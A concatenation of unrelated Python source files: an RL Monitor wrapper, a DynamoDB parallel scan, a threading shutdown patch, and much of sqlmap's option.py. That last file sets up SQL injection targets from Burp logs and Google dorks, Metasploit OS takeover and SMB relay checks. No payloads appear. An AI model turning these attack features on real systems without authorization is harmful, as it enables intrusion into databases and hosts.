remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
@property
def num_envs(self):
return len(self.remotes)
class RunningMeanStd(object):
# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
def __init__(self, epsilon=1e-4, shape=()):
self.mean = np.zeros(shape, 'float64')
self.var = np.zeros(shape, 'float64')
self.count = epsilon
def update(self, x):
batch_mean = np.mean(x, axis=0)
batch_var = np.var(x, axis=0)
batch_count = x.shape[0]
delta = batch_mean - self.mean
tot_count = self.count + batch_count
new_mean = self.mean + delta * batch_count / tot_count
m_a = self.var * (self.count)
m_b = batch_var * (batch_count)
M2 = m_a + m_b + np.square(delta) * self.count * batch_count / (self.count + batch_count)
new_var = M2 / (self.count + batch_count)
new_count = batch_count + self.count
self.mean = new_mean
self.var = new_var
self.count = new_count
class Monitor(Wrapper):
EXT = "monitor.csv"
f = None
def __init__(self, env, filename, allow_early_resets=False, reset_keywords=()):
Wrapper.__init__(self, env=env)
self.tstart = time.time()
if filename is None:
self.f = None
self.logger = None
else:
if not filename.endswith(Monitor.EXT):
if osp.isdir(filename):
filename = osp.join(filename, Monitor.EXT)
else:
filename = filename + "." + Monitor.EXT
self.f = open(filename, "wt")
self.f.write('#%s\n'%json.dumps({"t_start": self.tstart, "gym_version": gym.__version__,
"env_id": env.spec.id if env.spec else 'Unknown'}))
self.logger = csv.DictWriter(self.f, fieldnames=('r', 'l', 't')+reset_keywords)
self.logger.writeheader()
self.reset_keywords = reset_keywords
self.allow_early_resets = allow_early_resets
self.rewards = None
self.needs_reset = True
self.episode_rewards = []
self.episode_lengths = []
self.total_steps = 0
self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
def _reset(self, **kwargs):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
self.rewards = []
self.needs_reset = False
for k in self.reset_keywords:
v = kwargs.get(k)
if v is None:
raise ValueError('Expected you to pass kwarg %s into reset'%k)
self.current_reset_info[k] = v
return self.env.reset(**kwargs)
def _step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
ob, rew, done, info = self.env.step(action)
self.rewards.append(rew)
if done:
self.needs_reset = True
eprew = sum(self.rewards)
eplen = len(self.rewards)
epinfo = {"r": round(eprew, 6), "l": eplen, "t": round(time.time() - self.tstart, 6)}
epinfo.update(self.current_reset_info)
if self.logger:
self.logger.writerow(epinfo)
self.f.flush()
self.episode_rewards.append(eprew)
self.episode_lengths.append(eplen)
info['episode'] = epinfo
self.total_steps += 1
return (ob, rew, done, info)
def close(self):
if self.f is not None:
self.f.close()
def get_total_steps(self):
return self.total_steps
def get_episode_rewards(self):
return self.episode_rewards
def get_episode_lengths(self):
return self.episode_lengths |
scan_parallel.py | from __future__ import print_function # Python 2/3 compatibility
import time, sys, boto3, threading
from botocore.exceptions import ClientError
# Create Client
session = boto3.session.Session(region_name="eu-west-1")
dynamoDbClient = session.client('dynamodb')
def scan_table(segment, total_segments):
# Print thread starting info
print('Starting Segment ' + str(segment))
try:
# Initial scan
response = dynamoDbClient.scan(
TableName=table_name,
Segment=segment,
TotalSegments=total_segments
)
# Paginate for each thread, returning 1MB of data each iteration
while 'LastEvaluatedKey' in response:
response = dynamoDbClient.scan(
TableName=table_name,
Segment=segment,
TotalSegments=total_segments,
ExclusiveStartKey=response['LastEvaluatedKey']
)
except ClientError as error:
print("Something went wrong: ")
print(error.response['ResponseMetadata'])
def create_threads():
thread_list = []
# Instantiate and store the thread
for i in range(threads):
thread = threading.Thread(
target=scan_table, args=(i, threads))
thread_list.append(thread)
# Start threads
for thread in thread_list:
thread.start()
# Block main thread until all threads are finished
for thread in thread_list:
thread.join()
# Main Function / Timer
if __name__ == "__main__":
table_name = "AmazonBins"
# Number of threads
threads = 10
# Calculate time taken
start = time.time()
# Create Threads
create_threads()
# Finish time after all threads are complete
end = time.time()
# Print time took
print(end - start)
|
fix_threading_shutdown.py | """
threading._shutdown changed. It used to call "join" on every non-daemon Thread. This kind of kills the purpose for
this library. This library was created to automatically join and safely clean up long running threads. This module
changes "_shutdown" to "join" all non-daemon Threads again.
"""
import threading
__all__ = ['shutdown', 'get_shutdown_timeout', 'set_shutdown_timeout', 'get_allow_shutdown', 'set_allow_shutdown',
'threading_shutdown', 'custom_shutdown', 'using_custom_shutdown', 'set_shutdown', 'reset_shutdown']
SHUTDOWN_TIMEOUT = 1
ALLOW_SHUTDOWN = False
def get_shutdown_timeout():
"""Return the shutdown timeout value."""
global SHUTDOWN_TIMEOUT
return SHUTDOWN_TIMEOUT
def set_shutdown_timeout(value):
"""Set the shutdown timeout value (int)."""
global SHUTDOWN_TIMEOUT
SHUTDOWN_TIMEOUT = value
def get_allow_shutdown():
"""Return if "shutdown" automatically calls the thread allow_shutdown."""
global ALLOW_SHUTDOWN
return ALLOW_SHUTDOWN
def set_allow_shutdown(value):
"""Set if "shutdown" automatically calls the thread allow_shutdown."""
global ALLOW_SHUTDOWN
ALLOW_SHUTDOWN = value
def shutdown(timeout=None, allow_shutdown=True):
"""Join and allow all threads to shutdown.
Python's threading._shutdown may hang preventing the process from exiting completely. It uses the "_tstate_lock"
to wait for every thread to "join". Python's threading._shutdown used to call join to achieve the same behavior.
This library overrides threading._shutdown to "join" all Threads before the process ends.
You may want to put this at the end of your code. Atexit will not work for this.
I did not have a problem with Python 3.4. I noticed this issue in Python 3.8. I do not know
when this changed and stopped working.
.. code-block :: python
import time
import continuous_threading
def do_something():
print('hello')
time.sleep(1)
th = continuous_threading.PausableThread(target=do_something)
th.start()
time.sleep(10)
continuous_threading.shutdown()
Args:
timeout (int/float)[None]: Timeout argument to pass into every thread's join method.
allow_shutdown (bool)[True]: If True also call allow_shutdown on the thread.
"""
if allow_shutdown is None:
allow_shutdown = get_allow_shutdown()
for th in threading.enumerate():
# Join the thread if not joined
try:
if th is not threading.main_thread() and th.is_alive() and not th.isDaemon():
th.join(timeout)
except (AttributeError, ValueError, TypeError, Exception) as err:
print(err)
# Allow threading._shutdown() to continue
if allow_shutdown:
try:
th.allow_shutdown()
except (AttributeError, Exception):
pass
# Save the original threading._shutdown function
threading_shutdown = threading._shutdown
def custom_shutdown():
"""Safely shutdown the threads."""
shutdown(get_shutdown_timeout(), get_allow_shutdown())
threading_shutdown()
def using_custom_shutdown():
"""Return True if the threading._shutdown function is using the custom shutdown function."""
return threading._shutdown != threading_shutdown
def set_shutdown(func=None):
"""Set the threading._shutdown function to "join" all threads."""
if func is None:
func = custom_shutdown
threading._shutdown = func
def reset_shutdown():
"""Reset the threading._shutdown function to use its original function."""
threading._shutdown = threading_shutdown
# Change threading._shutdown to use our custom function
set_shutdown()
|
option.py | #!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
import cookielib
import glob
import inspect
import logging
import httplib
import os
import random
import re
import socket
import string
import sys
import tempfile
import threading
import time
import urllib2
import urlparse
import lib.controller.checks
import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.search
from lib.controller.checks import checkConnection
from lib.core.common import Backend
from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import extractRegexResult
from lib.core.common import filterStringValue
from lib.core.common import findLocalPort
from lib.core.common import findPageForms
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getFileType
from lib.core.common import getUnicode
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import openFile
from lib.core.common import parseTargetDirect
from lib.core.common import parseTargetUrl
from lib.core.common import paths
from lib.core.common import randomStr
from lib.core.common import readCachedFileContent
from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser
from lib.core.common import saveConfig
from lib.core.common import setOptimize
from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import mergedOptions
from lib.core.data import queries
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DUMP_REPLACEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import AUTH_TYPE
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DUMP_FORMAT
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MOBILES
from lib.core.enums import OPTION_TYPE
from lib.core.enums import PAYLOAD
from lib.core.enums import PRIORITY
from lib.core.enums import PROXY_TYPE
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import WIZARD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import FORMATTER
from lib.core.optiondict import optDict
from lib.core.settings import BURP_REQUEST_REGEX
from lib.core.settings import BURP_XML_HISTORY_REGEX
from lib.core.settings import CODECS_LIST_PAGE
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_ALIASES
from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
from lib.core.settings import DUMMY_URL
from lib.core.settings import INJECT_HERE_MARK
from lib.core.settings import IS_WIN
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
from lib.core.settings import LOCALHOST
from lib.core.settings import MAX_CONNECT_RETRIES
from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
from lib.core.settings import SITE
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import SUPPORTED_OS
from lib.core.settings import TIME_DELAY_CANDIDATES
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNION_CHAR_REGEX
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import VERSION_STRING
from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData
from lib.core.threads import setDaemon
from lib.core.update import update
from lib.parse.configfile import configFileParser
from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
from lib.request.connect import Connect as Request
from lib.request.dns import DNSServer
from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler
from lib.request.httpshandler import HTTPSHandler
from lib.request.pkihandler import HTTPSPKIAuthHandler
from lib.request.rangehandler import HTTPRangeHandler
from lib.request.redirecthandler import SmartRedirectHandler
from lib.request.templates import getPageTemplate
from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
authHandler = urllib2.BaseHandler()
httpsHandler = HTTPSHandler()
keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html
try:
WindowsError
except NameError:
WindowsError = None
def _feedTargetsDict(reqFile, addedTargetUrls):
"""
Parses web scarab and burp logs and adds results to the target URL list
"""
def _parseWebScarabLog(content):
"""
Parses web scarab logs (POST method not supported)
"""
reqResList = content.split(WEBSCARAB_SPLITTER)
for request in reqResList:
url = extractRegexResult(r"URL: (?P<result>.+?)\n", request, re.I)
method = extractRegexResult(r"METHOD: (?P<result>.+?)\n", request, re.I)
cookie = extractRegexResult(r"COOKIE: (?P<result>.+?)\n", request, re.I)
if not method or not url:
logger.debug("not a valid WebScarab log data")
continue
if method.upper() == HTTPMETHOD.POST:
warnMsg = "POST requests from WebScarab logs aren't supported "
warnMsg += "as their body content is stored in separate files. "
warnMsg += "Nevertheless you can use -r to load them individually."
logger.warning(warnMsg)
continue
if not(conf.scope and not re.search(conf.scope, url, re.I)):
if not kb.targets or url not in addedTargetUrls:
kb.targets.add((url, method, None, cookie, None))
addedTargetUrls.add(url)
def _parseBurpLog(content):
"""
Parses burp logs
"""
if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S):
if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
reqResList = []
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
port, request = match.groups()
try:
request = request.decode("base64")
except binascii.Error:
continue
_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
if _:
host = _.group(0).strip()
if not re.search(r":\d+\Z", host):
request = request.replace(host, "%s:%d" % (host, int(port)))
reqResList.append(request)
else:
reqResList = [content]
else:
reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
for match in reqResList:
request = match if isinstance(match, basestring) else match.group(0)
request = re.sub(r"\A[^\w]+", "", request)
schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
if schemePort:
scheme = schemePort.group(1)
port = schemePort.group(2)
request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
else:
scheme, port = None, None
if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M):
continue
if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M):
continue
getPostReq = False
url = None
host = None
method = None
data = None
cookie = None
params = False
newline = None
lines = request.split('\n')
headers = []
for index in xrange(len(lines)):
line = lines[index]
if not line.strip() and index == len(lines) - 1:
break
newline = "\r\n" if line.endswith('\r') else '\n'
line = line.strip('\r')
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
data = ""
params = True
elif match:
method = match.group(1)
url = match.group(2)
if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)):
params = True
getPostReq = True
# POST parameters
elif data is not None and params:
data += "%s%s" % (line, newline)
# GET parameters
elif "?" in line and "=" in line and ": " not in line:
params = True
# Headers
elif re.search(r"\A\S+:", line):
key, value = line.split(":", 1)
value = value.strip().replace("\r", "").replace("\n", "")
# Cookie and Host headers
if key.upper() == HTTP_HEADER.COOKIE.upper():
cookie = value
elif key.upper() == HTTP_HEADER.HOST.upper():
if '://' in value:
scheme, value = value.split('://')[:2]
splitValue = value.split(":")
host = splitValue[0]
if len(splitValue) > 1:
port = filterStringValue(splitValue[1], "[0-9]")
# Avoid to add a static content length header to
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
params = True
# Avoid proxy and connection type related headers
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
headers.append((getUnicode(key), getUnicode(value)))
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
params = True
data = data.rstrip("\r\n") if data else data
if getPostReq and (params or cookie):
if not port and isinstance(scheme, basestring) and scheme.lower() == "https":
port = "443"
elif not scheme and port == "443":
scheme = "https"
if conf.forceSSL:
scheme = "https"
port = port or "443"
if not host:
errMsg = "invalid format of a request file"
raise SqlmapSyntaxException, errMsg
if not url.startswith("http"):
url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
scheme = None
port = None
if not(conf.scope and not re.search(conf.scope, url, re.I)):
if not kb.targets or url not in addedTargetUrls:
kb.targets.add((url, conf.method or method, data, cookie, tuple(headers)))
addedTargetUrls.add(url)
checkFile(reqFile)
try:
with openFile(reqFile, "rb") as f:
content = f.read()
except (IOError, OSError, MemoryError), ex:
errMsg = "something went wrong while trying "
errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex))
raise SqlmapSystemException(errMsg)
if conf.scope:
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
_parseBurpLog(content)
_parseWebScarabLog(content)
if not addedTargetUrls:
errMsg = "unable to find usable request(s) "
errMsg += "in provided file ('%s')" % reqFile
raise SqlmapGenericException(errMsg)
def _loadQueries():
"""
Loads queries from 'xml/queries.xml' file.
"""
def iterate(node, retVal=None):
class DictObject(object):
def __init__(self):
self.__dict__ = {}
def __contains__(self, name):
return name in self.__dict__
if retVal is None:
retVal = DictObject()
for child in node.findall("*"):
instance = DictObject()
retVal.__dict__[child.tag] = instance
if child.attrib:
instance.__dict__.update(child.attrib)
else:
iterate(child, instance)
return retVal
tree = ElementTree()
try:
tree.parse(paths.QUERIES_XML)
except Exception, ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
for node in tree.findall("*"):
queries[node.attrib['value']] = iterate(node)
def _setMultipleTargets():
"""
Define a configuration parameter if we are running in multiple target
mode.
"""
initialTargetsCount = len(kb.targets)
addedTargetUrls = set()
if not conf.logFile:
return
debugMsg = "parsing targets list from '%s'" % conf.logFile
logger.debug(debugMsg)
if not os.path.exists(conf.logFile):
errMsg = "the specified list of targets does not exist"
raise SqlmapFilePathException(errMsg)
if os.path.isfile(conf.logFile):
_feedTargetsDict(conf.logFile, addedTargetUrls)
elif os.path.isdir(conf.logFile):
files = os.listdir(conf.logFile)
files.sort()
for reqFile in files:
if not re.search("([\d]+)\-request", reqFile):
continue
_feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls)
else:
errMsg = "the specified list of targets is not a file "
errMsg += "nor a directory"
raise SqlmapFilePathException(errMsg)
updatedTargetsCount = len(kb.targets)
if updatedTargetsCount > initialTargetsCount:
infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount)
infoMsg += "(parameter unique) requests from the "
infoMsg += "targets list ready to be tested"
logger.info(infoMsg)
def _adjustLoggingFormatter():
"""
Solves problem of line deletition caused by overlapping logging messages
and retrieved data info in inference mode
"""
if hasattr(FORMATTER, '_format'):
return
def format(record):
message = FORMATTER._format(record)
message = boldifyMessage(message)
if kb.get("prependFlag"):
message = "\n%s" % message
kb.prependFlag = False
return message
FORMATTER._format = FORMATTER.format
FORMATTER.format = format
def _setRequestFromFile():
"""
This function checks if the way to make a HTTP request is through supplied
textual file, parses it and saves the information into the knowledge base.
"""
if not conf.requestFile:
return
addedTargetUrls = set()
conf.requestFile = safeExpandUser(conf.requestFile)
if not os.path.isfile(conf.requestFile):
errMsg = "specified HTTP request file '%s' " % conf.requestFile
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
logger.info(infoMsg)
_feedTargetsDict(conf.requestFile, addedTargetUrls)
def _setCrawler():
if not conf.crawlDepth:
return
if not any((conf.bulkFile, conf.sitemapUrl)):
crawl(conf.url)
else:
if conf.bulkFile:
targets = getFileItems(conf.bulkFile)
else:
targets = parseSitemap(conf.sitemapUrl)
for i in xrange(len(targets)):
try:
target = targets[i]
crawl(target)
if conf.verbose in (1, 2):
status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
except Exception, ex:
errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex))
logger.error(errMsg)
def _doSearch():
"""
This function performs search dorking, parses results
and saves the testable hosts into the knowledge base.
"""
if not conf.googleDork:
return
kb.data.onlyGETs = None
def retrieve():
links = search(conf.googleDork)
if not links:
errMsg = "unable to find results for your "
errMsg += "search dork expression"
raise SqlmapGenericException(errMsg)
for link in links:
link = urldecode(link)
if re.search(r"(.*?)\?(.+)", link):
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
message = "do you want to scan only results containing GET parameters? [Y/n] "
kb.data.onlyGETs = readInput(message, default='Y', boolean=True)
if not kb.data.onlyGETs or conf.googleDork:
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
return links
while True:
links = retrieve()
if kb.targets:
infoMsg = "sqlmap got %d results for your " % len(links)
infoMsg += "search dork expression, "
if len(links) == len(kb.targets):
infoMsg += "all "
else:
infoMsg += "%d " % len(kb.targets)
infoMsg += "of them are testable targets"
logger.info(infoMsg)
break
else:
message = "sqlmap got %d results " % len(links)
message += "for your search dork expression, but none of them "
message += "have GET parameters to test for SQL injection. "
message += "Do you want to skip to the next result page? [Y/n]"
if not readInput(message, default='Y', boolean=True):
raise SqlmapSilentQuitException
else:
conf.googlePage += 1
def _setBulkMultipleTargets():
if not conf.bulkFile:
return
conf.bulkFile = safeExpandUser(conf.bulkFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
logger.info(infoMsg)
if not os.path.isfile(conf.bulkFile):
errMsg = "the specified bulk file "
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
found = False
for line in getFileItems(conf.bulkFile):
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
found = True
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
logger.warn(warnMsg)
def _setSitemapTargets():
if not conf.sitemapUrl:
return
infoMsg = "parsing sitemap '%s'" % conf.sitemapUrl
logger.info(infoMsg)
found = False
for item in parseSitemap(conf.sitemapUrl):
if re.match(r"[^ ]+\?(.+)", item, re.I):
found = True
kb.targets.add((item.strip(), None, None, None, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
logger.warn(warnMsg)
def _findPageForms():
if not conf.forms or conf.crawlDepth:
return
if conf.url and not checkConnection():
return
infoMsg = "searching for forms"
logger.info(infoMsg)
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
page, _, _ = Request.queryPage(content=True)
findPageForms(page, conf.url, True, True)
else:
if conf.bulkFile:
targets = getFileItems(conf.bulkFile)
elif conf.sitemapUrl:
targets = parseSitemap(conf.sitemapUrl)
elif conf.googleDork:
targets = [_[0] for _ in kb.targets]
kb.targets.clear()
for i in xrange(len(targets)):
try:
target = targets[i]
page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False)
findPageForms(page, target, False, True)
if conf.verbose in (1, 2):
status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
except KeyboardInterrupt:
break
except Exception, ex:
errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex))
logger.error(errMsg)
def _setDBMSAuthentication():
"""
Check and set the DBMS authentication credentials to run statements as
another user, not the session user
"""
if not conf.dbmsCred:
return
debugMsg = "setting the DBMS authentication credentials"
logger.debug(debugMsg)
match = re.search("^(.+?):(.*?)$", conf.dbmsCred)
if not match:
errMsg = "DBMS authentication credentials value must be in format "
errMsg += "username:password"
raise SqlmapSyntaxException(errMsg)
conf.dbmsUsername = match.group(1)
conf.dbmsPassword = match.group(2)
def _setMetasploit():
if not conf.osPwn and not conf.osSmb and not conf.osBof:
return
debugMsg = "setting the takeover out-of-band functionality"
logger.debug(debugMsg)
msfEnvPathExists = False
if IS_WIN:
try:
import win32file
except ImportError:
errMsg = "sqlmap requires third-party module 'pywin32' "
errMsg += "in order to use Metasploit functionalities on "
errMsg += "Windows. You can download it from "
errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'"
raise SqlmapMissingDependence(errMsg)
if not conf.msfPath:
def _(key, value):
retVal = None
try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key)
retVal = QueryValueEx(_, value)[0]
except:
logger.debug("unable to identify Metasploit installation path via registry key")
return retVal
conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location")
if conf.msfPath:
conf.msfPath = os.path.join(conf.msfPath, "msf3")
if conf.osSmb:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a SMB relay attack because "
errMsg += "it will need to listen on a user-specified SMB "
errMsg += "TCP port for incoming connection attempts"
raise SqlmapMissingPrivileges(errMsg)
if conf.msfPath:
for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
kb.oldMsf = True
else:
msfEnvPathExists = False
conf.msfPath = path
break
if msfEnvPathExists:
debugMsg = "provided Metasploit Framework path "
debugMsg += "'%s' is valid" % conf.msfPath
logger.debug(debugMsg)
else:
warnMsg = "the provided Metasploit Framework path "
warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
warnMsg += "be that the path does not exists or that one "
warnMsg += "or more of the needed Metasploit executables "
warnMsg += "within msfcli, msfconsole, msfencode and "
warnMsg += "msfpayload do not exist"
logger.warn(warnMsg)
else:
warnMsg = "you did not provide the local path where Metasploit "
warnMsg += "Framework is installed"
logger.warn(warnMsg)
if not msfEnvPathExists:
warnMsg = "sqlmap is going to look for Metasploit Framework "
warnMsg += "installation inside the environment path(s)"
logger.warn(warnMsg)
envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":")
for envPath in envPaths:
envPath = envPath.replace(";", "")
if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
kb.oldMsf = True
else:
msfEnvPathExists = False
if msfEnvPathExists:
infoMsg = "Metasploit Framework has been found "
infoMsg += "installed in the '%s' path" % envPath
logger.info(infoMsg)
conf.msfPath = envPath
break
if not msfEnvPathExists:
errMsg = "unable to locate Metasploit Framework installation. "
errMsg += "You can get it at 'http://www.metasploit.com/download/'"
raise SqlmapFilePathException(errMsg)
def _setWriteFile():
if not conf.wFile:
return
debugMsg = "setting the write file functionality"
logger.debug(debugMsg)
if not os.path.exists(conf.wFile):
errMsg = "the provided local file '%s' does not exist" % conf.wFile
raise SqlmapFilePathException(errMsg)
if not conf.dFile:
errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.wFile
raise SqlmapMissingMandatoryOptionException(errMsg)
conf.wFileType = getFileType(conf.wFile)
def _setOS():
"""
Force the back-end DBMS operating system option.
"""
if not conf.os:
return
if conf.os.lower() not in SUPPORTED_OS:
errMsg = "you provided an unsupported back-end DBMS operating "
errMsg += "system. The supported DBMS operating systems for OS "
errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS])
errMsg += "If you do not know the back-end DBMS underlying OS, "
errMsg += "do not provide it and sqlmap will fingerprint it for "
errMsg += "you."
raise SqlmapUnsupportedDBMSException(errMsg)
debugMsg = "forcing back-end DBMS operating system to user defined "
debugMsg += "value '%s'" % conf.os
logger.debug(debugMsg)
Backend.setOs(conf.os)
def _setTechnique():
validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
validLetters = [_[0][0].upper() for _ in validTechniques]
if conf.tech and isinstance(conf.tech, basestring):
_ = []
for letter in conf.tech.upper():
if letter not in validLetters:
errMsg = "value for --technique must be a string composed "
errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
errMsg += "user's manual for details"
raise SqlmapSyntaxException(errMsg)
for validTech, validInt in validTechniques:
if letter == validTech[0]:
_.append(validInt)
break
conf.tech = _
def _setDBMS():
"""
Force the back-end DBMS option.
"""
if not conf.dbms:
return
debugMsg = "forcing back-end DBMS to user defined value"
logger.debug(debugMsg)
conf.dbms = conf.dbms.lower()
